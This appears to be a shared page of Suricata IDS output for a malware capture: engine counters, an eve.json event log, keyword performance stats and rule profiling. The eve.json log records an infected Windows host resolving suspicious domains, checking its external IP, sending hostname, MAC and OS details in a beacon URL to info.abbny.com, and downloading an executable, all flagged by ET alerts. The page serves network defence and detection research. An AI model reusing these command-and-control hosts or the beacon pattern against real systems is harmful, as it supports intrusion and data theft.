detect.alert                               | Total                     | 17
detect.nonmpm_list                         | Total                     | 6
detect.fnonmpm_list                        | Total                     | 3
detect.match_list                          | Total                     | 4
app_layer.flow.http                        | Total                     | 11
app_layer.tx.http                          | Total                     | 14
app_layer.flow.tls                         | Total                     | 1
app_layer.flow.dns_udp                     | Total                     | 8
app_layer.tx.dns_udp                       | Total                     | 8
app_layer.flow.failed_udp                  | Total                     | 13
flow_mgr.new_pruned                        | Total                     | 12
flow.spare                                 | Total                     | 10000
flow_mgr.flows_checked                     | Total                     | 363
flow_mgr.flows_notimeout                   | Total                     | 363
flow_mgr.rows_checked                      | Total                     | 65536
flow_mgr.rows_skipped                      | Total                     | 65183
flow_mgr.rows_maxlen                       | Total                     | 2
tcp.memuse                                 | Total                     | 573440
tcp.reassembly_memuse                      | Total                     | 81920
flow.memuse                                | Total                     | 7919296


eve.json - (27873 bytes) - download
{"timestamp":"2019-03-29T09:47:38.758657+0000","flow_id":1339032990290817,"pcap_cnt":31,"event_type":"dns","src_ip":"192.168.240.16","src_port":62683,"dest_ip":"8.8.8.8","dest_port":53,"proto":"UDP","dns":{"type":"query","id":2207,"rrname":"acroipm2.adobe.com","rrtype":"A","tx_id":0}}
{"timestamp":"2019-03-29T09:47:40.827629+0000","flow_id":238658074222829,"pcap_cnt":32,"event_type":"dns","src_ip":"192.168.240.16","src_port":63759,"dest_ip":"8.8.8.8","dest_port":53,"proto":"UDP","dns":{"type":"query","id":13503,"rrname":"armmf.corp.adobe.com","rrtype":"A","tx_id":0}}
{"timestamp":"2019-03-29T09:47:38.776667+0000","flow_id":238658074222829,"pcap_cnt":33,"event_type":"dns","src_ip":"8.8.8.8","src_port":53,"dest_ip":"192.168.240.16","dest_port":63759,"proto":"UDP","dns":{"type":"answer","id":13503,"rcode":"NXDOMAIN","rrname":"armmf.corp.adobe.com"}}
{"timestamp":"2019-03-29T09:47:38.776667+0000","flow_id":238658074222829,"pcap_cnt":33,"event_type":"dns","src_ip":"8.8.8.8","src_port":53,"dest_ip":"192.168.240.16","dest_port":63759,"proto":"UDP","dns":{"type":"answer","id":13503,"rcode":"NXDOMAIN","rrname":"adobe.com","rrtype":"SOA","ttl":133}}
{"timestamp":"2019-03-29T09:47:38.793751+0000","flow_id":1339032990290817,"pcap_cnt":34,"event_type":"dns","src_ip":"8.8.8.8","src_port":53,"dest_ip":"192.168.240.16","dest_port":62683,"proto":"UDP","dns":{"type":"answer","id":2207,"rcode":"NOERROR","rrname":"acroipm2.adobe.com","rrtype":"CNAME","ttl":2639,"rdata":"acroipm2.adobe.com.edgesuite.net"}}
{"timestamp":"2019-03-29T09:47:38.793751+0000","flow_id":1339032990290817,"pcap_cnt":34,"event_type":"dns","src_ip":"8.8.8.8","src_port":53,"dest_ip":"192.168.240.16","dest_port":62683,"proto":"UDP","dns":{"type":"answer","id":2207,"rcode":"NOERROR","rrname":"acroipm2.adobe.com.edgesuite.net","rrtype":"CNAME","ttl":21032,"rdata":"a122.g2.akamai.net"}}
{"timestamp":"2019-03-29T09:47:38.793751+0000","flow_id":1339032990290817,"pcap_cnt":34,"event_type":"dns","src_ip":"8.8.8.8","src_port":53,"dest_ip":"192.168.240.16","dest_port":62683,"proto":"UDP","dns":{"type":"answer","id":2207,"rcode":"NOERROR","rrname":"a122.g2.akamai.net","rrtype":"A","ttl":19,"rdata":"204.237.142.145"}}
{"timestamp":"2019-03-29T09:47:38.793751+0000","flow_id":1339032990290817,"pcap_cnt":34,"event_type":"dns","src_ip":"8.8.8.8","src_port":53,"dest_ip":"192.168.240.16","dest_port":62683,"proto":"UDP","dns":{"type":"answer","id":2207,"rcode":"NOERROR","rrname":"a122.g2.akamai.net","rrtype":"A","ttl":19,"rdata":"204.237.142.136"}}
{"timestamp":"2019-03-29T09:47:38.928936+0000","flow_id":888907532888675,"pcap_cnt":45,"event_type":"http","src_ip":"192.168.240.16","src_port":49425,"dest_ip":"204.237.142.145","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"acroipm2.adobe.com","url":"\/18\/rdr\/ENU\/win\/nooem\/none\/consumer\/278_18_11_20038.zip","http_user_agent":"IPM","http_content_type":"application\/zip"}}
{"timestamp":"2019-03-29T09:47:38.930545+0000","flow_id":1253455767040432,"pcap_cnt":48,"event_type":"http","src_ip":"192.168.240.16","src_port":49426,"dest_ip":"204.237.142.145","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"acroipm2.adobe.com","url":"\/18\/rdr\/ENU\/win\/nooem\/none\/consumer\/277_18_11_20038.zip","http_user_agent":"IPM","http_content_type":"application\/zip"}}
{"timestamp":"2019-03-29T09:47:38.990968+0000","flow_id":888907532888675,"pcap_cnt":52,"event_type":"http","src_ip":"192.168.240.16","src_port":49425,"dest_ip":"204.237.142.145","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"acroipm2.adobe.com","url":"\/18\/rdr\/ENU\/win\/nooem\/none\/consumer\/281_18_11_20038.zip","http_user_agent":"IPM","http_content_type":"application\/zip"}}
{"timestamp":"2019-03-29T09:47:38.990968+0000","flow_id":1253455767040432,"pcap_cnt":54,"event_type":"http","src_ip":"192.168.240.16","src_port":49426,"dest_ip":"204.237.142.145","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"acroipm2.adobe.com","url":"\/18\/rdr\/ENU\/win\/nooem\/none\/consumer\/280_18_11_20038.zip","http_user_agent":"IPM","http_content_type":"application\/zip"}}
{"timestamp":"2019-03-29T09:47:40.427087+0000","flow_id":1253455767040432,"pcap_cnt":63,"event_type":"http","src_ip":"192.168.240.16","src_port":49426,"dest_ip":"204.237.142.145","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"acroipm2.adobe.com","url":"\/18\/rdr\/ENU\/win\/nooem\/none\/consumer\/message.zip","http_user_agent":"IPM","http_content_type":"application\/zip"}}
{"timestamp":"2019-03-29T09:49:10.060695+0000","flow_id":222981449510167,"pcap_cnt":85,"event_type":"dns","src_ip":"192.168.240.16","src_port":49331,"dest_ip":"8.8.8.8","dest_port":53,"proto":"UDP","dns":{"type":"query","id":30006,"rrname":"v.beahh.com","rrtype":"A","tx_id":0}}
{"timestamp":"2019-03-29T09:49:10.079964+0000","flow_id":222981449510167,"pcap_cnt":86,"event_type":"dns","src_ip":"8.8.8.8","src_port":53,"dest_ip":"192.168.240.16","dest_port":49331,"proto":"UDP","dns":{"type":"answer","id":30006,"rcode":"NOERROR","rrname":"v.beahh.com","rrtype":"A","ttl":10,"rdata":"27.102.107.137"}}
{"timestamp":"2019-03-29T09:49:10.689650+0000","flow_id":893507448760061,"pcap_cnt":101,"event_type":"http","src_ip":"192.168.240.16","src_port":49427,"dest_ip":"27.102.107.137","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"v.beahh.com","url":"\/vWORKGROUP","http_content_type":"text\/plain"}}
{"timestamp":"2019-03-29T09:49:22.984973+0000","flow_id":893507448760061,"pcap_cnt":102,"event_type":"fileinfo","src_ip":"27.102.107.137","src_port":80,"dest_ip":"192.168.240.16","dest_port":49427,"proto":"TCP","http":{"hostname":"v.beahh.com","url":"\/vWORKGROUP","http_content_type":"text\/plain","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6399},"app_proto":"http","fileinfo":{"filename":"\/vWORKGROUP","gaps":false,"state":"CLOSED","stored":false,"size":6399,"tx_id":0}}
{"timestamp":"2019-03-29T09:49:31.426246+0000","flow_id":1253455767040432,"pcap_cnt":106,"event_type":"fileinfo","src_ip":"204.237.142.145","src_port":80,"dest_ip":"192.168.240.16","dest_port":49426,"proto":"TCP","http":{"hostname":"acroipm2.adobe.com","url":"\/18\/rdr\/ENU\/win\/nooem\/none\/consumer\/message.zip","http_user_agent":"IPM","http_content_type":"application\/zip","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":9737},"app_proto":"http","fileinfo":{"filename":"\/18\/rdr\/ENU\/win\/nooem\/none\/consumer\/message.zip","gaps":false,"state":"CLOSED","stored":false,"size":9737,"tx_id":2}}
{"timestamp":"2019-03-29T09:49:28.626953+0000","flow_id":1853673158775049,"pcap_cnt":110,"event_type":"dns","src_ip":"192.168.240.16","src_port":57392,"dest_ip":"8.8.8.8","dest_port":53,"proto":"UDP","dns":{"type":"query","id":54797,"rrname":"info.ackng.com","rrtype":"A","tx_id":0}}
{"timestamp":"2019-03-29T09:49:31.963845+0000","flow_id":1853673158775049,"pcap_cnt":111,"event_type":"dns","src_ip":"8.8.8.8","src_port":53,"dest_ip":"192.168.240.16","dest_port":57392,"proto":"UDP","dns":{"type":"answer","id":54797,"rcode":"NXDOMAIN","rrname":"info.ackng.com"}}
{"timestamp":"2019-03-29T09:49:31.963845+0000","flow_id":1853673158775049,"pcap_cnt":111,"event_type":"dns","src_ip":"8.8.8.8","src_port":53,"dest_ip":"192.168.240.16","dest_port":57392,"proto":"UDP","dns":{"type":"answer","id":54797,"rcode":"NXDOMAIN","rrname":"ackng.com","rrtype":"SOA","ttl":23}}
{"timestamp":"2019-03-29T09:49:30.761257+0000","flow_id":1298613060410793,"pcap_cnt":112,"event_type":"dns","src_ip":"192.168.240.16","src_port":61488,"dest_ip":"8.8.8.8","dest_port":53,"proto":"UDP","dns":{"type":"query","id":50892,"rrname":"ip.42.pl","rrtype":"A","tx_id":0}}
{"timestamp":"2019-03-29T09:49:34.062260+0000","flow_id":1298613060410793,"pcap_cnt":113,"event_type":"dns","src_ip":"8.8.8.8","src_port":53,"dest_ip":"192.168.240.16","dest_port":61488,"proto":"UDP","dns":{"type":"answer","id":50892,"rcode":"NOERROR","rrname":"ip.42.pl","rrtype":"CNAME","ttl":10460,"rdata":"42.pl"}}
{"timestamp":"2019-03-29T09:49:34.062260+0000","flow_id":1298613060410793,"pcap_cnt":113,"event_type":"dns","src_ip":"8.8.8.8","src_port":53,"dest_ip":"192.168.240.16","dest_port":61488,"proto":"UDP","dns":{"type":"answer","id":50892,"rcode":"NOERROR","rrname":"42.pl","rrtype":"A","ttl":13904,"rdata":"79.98.145.42"}}
{"timestamp":"2019-03-29T09:49:34.063661+0000","flow_id":2125024897988781,"pcap_cnt":114,"event_type":"dns","src_ip":"192.168.240.16","src_port":50151,"dest_ip":"8.8.8.8","dest_port":53,"proto":"UDP","dns":{"type":"query","id":63584,"rrname":"info.beahh.com","rrtype":"A","tx_id":0}}
{"timestamp":"2019-03-29T09:49:34.065113+0000","flow_id":2125024897988781,"pcap_cnt":116,"event_type":"dns","src_ip":"8.8.8.8","src_port":53,"dest_ip":"192.168.240.16","dest_port":50151,"proto":"UDP","dns":{"type":"answer","id":63584,"rcode":"NXDOMAIN","rrname":"info.beahh.com"}}
{"timestamp":"2019-03-29T09:49:34.065113+0000","flow_id":2125024897988781,"pcap_cnt":116,"event_type":"dns","src_ip":"8.8.8.8","src_port":53,"dest_ip":"192.168.240.16","dest_port":50151,"proto":"UDP","dns":{"type":"answer","id":63584,"rcode":"NXDOMAIN","rrname":"beahh.com","rrtype":"SOA","ttl":1067}}
{"timestamp":"2019-03-29T09:49:34.388290+0000","flow_id":365561480146109,"pcap_cnt":126,"event_type":"alert","src_ip":"192.168.240.16","src_port":49428,"dest_ip":"79.98.145.42","dest_port":80,"proto":"TCP","tx_id":0,"alert":{"action":"allowed","gid":1,"signature_id":2811058,"rev":2,"signature":"ETPRO POLICY External IP Lookup - ip.42.pl","category":"Potential Corporate Privacy Violation","severity":1},"app_proto":"http"}
{"timestamp":"2019-03-29T09:49:34.388290+0000","flow_id":365561480146109,"pcap_cnt":126,"event_type":"alert","src_ip":"192.168.240.16","src_port":49428,"dest_ip":"79.98.145.42","dest_port":80,"proto":"TCP","app_proto":"http","tx_id":0,"alert":{"action":"allowed","gid":1,"signature_id":2013031,"rev":5,"signature":"ET POLICY Python-urllib\/ Suspicious User Agent","category":"Attempted Information Leak","severity":2}}
{"timestamp":"2019-03-29T09:49:34.388290+0000","flow_id":365561480146109,"pcap_cnt":126,"event_type":"http","src_ip":"192.168.240.16","src_port":49428,"dest_ip":"79.98.145.42","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"ip.42.pl","url":"\/raw","http_user_agent":"Python-urllib\/2.7","http_content_type":"text\/html"}}
{"timestamp":"2019-03-29T09:49:34.548857+0000","flow_id":365561480146109,"pcap_cnt":129,"event_type":"fileinfo","src_ip":"79.98.145.42","src_port":80,"dest_ip":"192.168.240.16","dest_port":49428,"proto":"TCP","http":{"hostname":"ip.42.pl","url":"\/raw","http_user_agent":"Python-urllib\/2.7","http_content_type":"text\/html","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":13},"app_proto":"http","fileinfo":{"filename":"\/raw","gaps":false,"state":"CLOSED","stored":false,"size":13,"tx_id":0}}
{"timestamp":"2019-03-29T09:49:32.799257+0000","flow_id":2069512445506073,"pcap_cnt":131,"event_type":"dns","src_ip":"192.168.240.16","src_port":50174,"dest_ip":"8.8.8.8","dest_port":53,"proto":"UDP","dns":{"type":"query","id":41144,"rrname":"jsonip.com","rrtype":"A","tx_id":0}}
{"timestamp":"2019-03-29T09:49:36.267500+0000","flow_id":2069512445506073,"pcap_cnt":132,"event_type":"dns","src_ip":"8.8.8.8","src_port":53,"dest_ip":"192.168.240.16","dest_port":50174,"proto":"UDP","dns":{"type":"answer","id":41144,"rcode":"NOERROR","rrname":"jsonip.com","rrtype":"A","ttl":280,"rdata":"45.79.77.20"}}
{"timestamp":"2019-03-29T09:49:36.269304+0000","flow_id":657318608903160,"pcap_cnt":134,"event_type":"dns","src_ip":"192.168.240.16","src_port":49762,"dest_ip":"8.8.8.8","dest_port":53,"proto":"UDP","dns":{"type":"query","id":43817,"rrname":"info.abbny.com","rrtype":"A","tx_id":0}}
{"timestamp":"2019-03-29T09:49:36.272085+0000","flow_id":828206767675481,"pcap_cnt":141,"event_type":"alert","src_ip":"192.168.240.16","src_port":49429,"dest_ip":"45.79.77.20","dest_port":80,"proto":"TCP","tx_id":0,"alert":{"action":"allowed","gid":1,"signature_id":2013031,"rev":5,"signature":"ET POLICY Python-urllib\/ Suspicious User Agent","category":"Attempted Information Leak","severity":2},"app_proto":"http"}
{"timestamp":"2019-03-29T09:49:36.272085+0000","flow_id":828206767675481,"pcap_cnt":141,"event_type":"http","src_ip":"192.168.240.16","src_port":49429,"dest_ip":"45.79.77.20","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"jsonip.com","url":"\/","http_user_agent":"Python-urllib\/2.7","http_content_type":"text\/html"}}
{"timestamp":"2019-03-29T09:49:36.274606+0000","flow_id":828206767675481,"pcap_cnt":143,"event_type":"fileinfo","src_ip":"45.79.77.20","src_port":80,"dest_ip":"192.168.240.16","dest_port":49429,"proto":"TCP","http":{"hostname":"jsonip.com","url":"\/","http_user_agent":"Python-urllib\/2.7","http_content_type":"text\/html","http_method":"GET","protocol":"HTTP\/1.1","status":301,"redirect":"https:\/\/jsonip.com\/","length":194},"app_proto":"http","fileinfo":{"filename":"\/","gaps":false,"state":"CLOSED","stored":false,"size":194,"tx_id":0}}
{"timestamp":"2019-03-29T09:49:36.352934+0000","flow_id":657318608903160,"pcap_cnt":144,"event_type":"dns","src_ip":"8.8.8.8","src_port":53,"dest_ip":"192.168.240.16","dest_port":49762,"proto":"UDP","dns":{"type":"answer","id":43817,"rcode":"NOERROR","rrname":"info.abbny.com","rrtype":"A","ttl":21599,"rdata":"153.92.4.49"}}
{"timestamp":"2019-03-29T09:49:36.699781+0000","flow_id":1865398420006455,"pcap_cnt":155,"event_type":"alert","src_ip":"192.168.240.16","src_port":49430,"dest_ip":"153.92.4.49","dest_port":80,"proto":"TCP","tx_id":0,"alert":{"action":"allowed","gid":1,"signature_id":2013031,"rev":5,"signature":"ET POLICY Python-urllib\/ Suspicious User Agent","category":"Attempted Information Leak","severity":2},"app_proto":"http"}
{"timestamp":"2019-03-29T09:49:36.699781+0000","flow_id":1865398420006455,"pcap_cnt":155,"event_type":"http","src_ip":"192.168.240.16","src_port":49430,"dest_ip":"153.92.4.49","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"info.abbny.com","url":"\/e.png?id=HAPUBWS-PC&mac=0A-00-27-9A-BA-7D,00-01-00-01-23-E2&OS=Windows-7-6.1.7601-SP1&BIT=32bit&IT=2019-03-29,11:50:40&c=1&VER=9&d=0&from=ipc&mpass=&size=6967023&num=0&sa=&dig=0&mdl=0","http_user_agent":"Python-urllib\/2.7","http_content_type":"image\/png"}}
{"timestamp":"2019-03-29T09:49:36.712023+0000","flow_id":1865398420006455,"pcap_cnt":156,"event_type":"fileinfo","src_ip":"153.92.4.49","src_port":80,"dest_ip":"192.168.240.16","dest_port":49430,"proto":"TCP","http":{"hostname":"info.abbny.com","url":"\/e.png?id=HAPUBWS-PC&mac=0A-00-27-9A-BA-7D,00-01-00-01-23-E2&OS=Windows-7-6.1.7601-SP1&BIT=32bit&IT=2019-03-29,11:50:40&c=1&VER=9&d=0&from=ipc&mpass=&size=6967023&num=0&sa=&dig=0&mdl=0","http_user_agent":"Python-urllib\/2.7","http_content_type":"image\/png","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":259},"app_proto":"http","fileinfo":{"filename":"\/e.png","gaps":false,"state":"CLOSED","stored":false,"size":259,"tx_id":0}}
{"timestamp":"2019-03-29T09:49:36.824279+0000","flow_id":101940682844607,"pcap_cnt":164,"event_type":"tls","src_ip":"192.168.240.16","src_port":49431,"dest_ip":"45.79.77.20","dest_port":443,"proto":"TCP","tls":{"subject":"C=US, ST=CA, L=San Francisco, O=Geuis, CN=Geuis Skill","issuerdn":"C=US, ST=CA, L=San Francisco, O=Geuis, CN=Geuis Skill"}}
{"timestamp":"2019-03-29T09:49:37.163101+0000","flow_id":1836617843986200,"pcap_cnt":180,"event_type":"alert","src_ip":"192.168.240.16","src_port":49432,"dest_ip":"27.102.130.126","dest_port":80,"proto":"TCP","tx_id":0,"alert":{"action":"allowed","gid":1,"signature_id":2016141,"rev":5,"signature":"ET INFO Executable Download from dotted-quad Host","category":"A Network Trojan was detected","severity":1},"app_proto":"http"}
{"timestamp":"2019-03-29T09:49:37.163101+0000","flow_id":1836617843986200,"pcap_cnt":180,"event_type":"alert","src_ip":"192.168.240.16","src_port":49432,"dest_ip":"27.102.130.126","dest_port":80,"proto":"TCP","app_proto":"http","tx_id":0,"alert":{"action":"allowed","gid":1,"signature_id":2013031,"rev":5,"signature":"ET POLICY Python-urllib\/ Suspicious User Agent","category":"Attempted Information Leak","severity":2}}
{"timestamp":"2019-03-29T09:49:37.163101+0000","flow_id":1836617843986200,"pcap_cnt":180,"event_type":"alert","src_ip":"192.168.240.16","src_port":49432,"dest_ip":"27.102.130.126","dest_port":80,"p

This file has been truncated. Go here to download in full.


keyword_perf.log - (17647 bytes) - download
  --------------------------------------------------------------------------------------------------------------------------------
  Date: 4/3/2019 -- 13:40:20
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: total
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  flags            57649016        20483           20483           1590130         2814.00         2814.00         0.00           
  flow             84278108        29201           29201           436644          2886.00         2886.00         0.00           
  threshold        60290806        20483           7               83373           2943.00         5459.00         2942.00        
  content          122694926       5636            1433            6031896         21769.00        34778.00        17334.00       
  pcre             2187719         388             14              37552           5638.00         10747.00        5447.00        
  byte_test        2372395         711             207             106067          3336.00         3925.00         3094.00        
  byte_jump        370516          124             40              10187           2988.00         3107.00         2931.00        
  isdataat         26424           9               1               3417            2936.00         2621.00         2975.00        
  flowbits         24908657        4478            81              5649782         5562.00         72968.00        4320.00        
  urilen           227899          74              49              4473            3079.00         3115.00         3008.00        
  byte_extract     17475           4               4               9482            4368.00         4368.00         0.00           
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: packet
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  flags            57649016        20483           20483           1590130         2814.00         2814.00         0.00           
  flow             84278108        29201           29201           436644          2886.00         2886.00         0.00           
  flowbits         19224706        4471            74              5238125         4299.00         3060.00         4320.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: packet/stream payload
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          32786510        2181            661             6031896         15032.00        19242.00        13202.00       
  pcre             324621          42              7               34528           7729.00         9621.00         7350.00        
  byte_test        2372395         711             207             106067          3336.00         3925.00         3094.00        
  byte_jump        349610          117             33              10187           2988.00         3132.00         2931.00        
  isdataat         26424           9               1               3417            2936.00         2621.00         2975.00        
  byte_extract     17475           4               4               9482            4368.00         4368.00         0.00           
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: post-match
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  flowbits         5683951         7               7               5649782         811993.00       811993.00       0.00           
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: threshold
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  threshold        60290806        20483           7               83373           2943.00         5459.00         2942.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_uri
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          780777          204             107             33913           3827.00         3590.00         4088.00        
  pcre             524128          61              5               36747           8592.00         10370.00        8433.00        
  urilen           227899          74              49              4473            3079.00         3115.00         3008.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_request_line
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          6661            2               2               3975            3330.00         3330.00         0.00           
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_client_body
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          219360          40              8               14398           5484.00         8918.00         4625.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_response_line
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          30013           9               0               3516            3334.00         0.00            3334.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: file_data
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          87733231        2895            478             5811807         30305.00        75282.00        21410.00       
  pcre             1143905         270             0               37552           4236.00         0.00            4236.00        
  byte_jump        20906           7               7               3537            2986.00         2986.00         0.00           
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_header
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          813867          213             114             9709            3820.00         3947.00         3675.00        
  pcre             129501          12              1               26803           10791.00        12866.00        10603.00       
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_header_names
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          157673          43              32              5080            3666.00         3600.00         3860.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_connection
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          13403           4               0               3763            3350.00         0.00            3350.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_content_type
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          13485           4               4               3728            3371.00         3371.00         0.00           
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_raw_header
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          3884            1               0               3884            3884.00         0.00            3884.00        
  pcre             22571           1               0               22571           22571.00        0.00            22571.00       
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_method
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          42892           12              9               4610            3574.00         3661.00         3314.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_user_agent
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          26150           8               4               3594            3268.00         3443.00         3094.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_host
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          34962           11              11              4150            3178.00         3178.00         0.00           
  pcre             42993           2               1               24598           21496.00        18395.00        24598.00       
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_stat_msg
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          3207            1               0               3207            3207.00         0.00            3207.00        
  ----------------------------------------------------------------------------------------------------------

This file has been truncated. Go here to download in full.


suricata-4.0.0-etpro-all-perf.txt-2019-04-03-T-13-40-21-04032019.1339-network.pcap.txt - (66005 bytes) - download
  --------------------------------------------------------------------------
  Date: 4/3/2019 -- 13:40:20. Sorted by: max ticks.
  --------------------------------------------------------------------------
   Num      Rule         Gid      Rev      Ticks        %      Checks   Matches  Max Ticks   Avg Ticks   Avg Match   Avg No Match
  -------- ------------ -------- -------- ------------ ------ -------- -------- ----------- ----------- ----------- -------------- 
  1        2820003      1        2        11655163     1.45   193      0        8964065     60389.45    0.00        60389.45   
  2        2803657      1        5        7967074      0.99   24       0        6263051     331961.42   0.00        331961.42  
  3        2008575      1        5        22230306     2.77   1787     0        6040488     12440.01    0.00        12440.01   
  4        2020865      1        3        31519817     3.93   178      0        5878575     177077.62   0.00        177077.62  
  5        2001583      1        16       207311777    25.87  13784    13784    5753140     15040.03    15040.03    0.00       
  6        2812091      1        1        5776240      0.72   6        1        5705798     962706.67   5705798.00  14088.40   
  7        2100540      1        12       5767310      0.72   33       0        5673724     174766.97   0.00        174766.97  
  8        2010935      1        3        118545537    14.79  13784    6699     5638918     8600.23     14803.11    2735.29    
  9        2809410      1        2        6390911      0.80   61       0        5520489     104769.03   0.00        104769.03  
  10       2812745      1        2        5398505      0.67   1        0        5398505     5398505.00  0.00        5398505.00 
  11       2102523      1        8        45356512     5.66   13806    0        5320190     3285.28     0.00        3285.28    
  12       2019822      1        7        6119547      0.76   61       0        5255332     100320.44   0.00        100320.44  
  13       2820158      1        2        24041039     3.00   131      0        2302893     183519.38   0.00        183519.38  
  14       2804508      1        2        1434947      0.18   3        1        1351541     478315.67   1351541.00  41703.00   
  15       2014958      1        1        1727023      0.22   40       0        1246698     43175.57    0.00        43175.57   
  16       2820157      1        2        21884150     2.73   131      0        1011453     167054.58   0.00        167054.58  
  17       2016112      1        3        3955169      0.49   176      0        790724      22472.55    0.00        22472.55   
  18       2802991      1        5        3058195      0.38   43       0        656847      71120.81    0.00        71120.81   
  19       2016502      1        2        2930641      0.37   160      0        544306      18316.51    0.00        18316.51   
  20       2024650      1        1        4519481      0.56   260      0        482739      17382.62    0.00        17382.62   
  21       2014473      1        5        3258807      0.41   196      0        428433      16626.57    0.00        16626.57   
  22       2802987      1        5        3491398      0.44   74       0        401283      47181.05    0.00        47181.05   
  23       2801929      1        7        3210303      0.40   46       0        400464      69789.20    0.00        69789.20   
  24       2819694      1        2        3312962      0.41   204      0        381670      16240.01    0.00        16240.01   
  25       2803027      1        6        3508396      0.44   59       0        380517      59464.34    0.00        59464.34   
  26       2801930      1        7        3205348      0.40   46       0        357170      69681.48    0.00        69681.48   
  27       2804907      1        3        1728986      0.22   29       0        346439      59620.21    0.00        59620.21   
  28       2804927      1        2        1972895      0.25   32       0        344011      61652.97    0.00        61652.97   
  29       2020569      1        1        966966       0.12   15       0        340578      64464.40    0.00        64464.40   
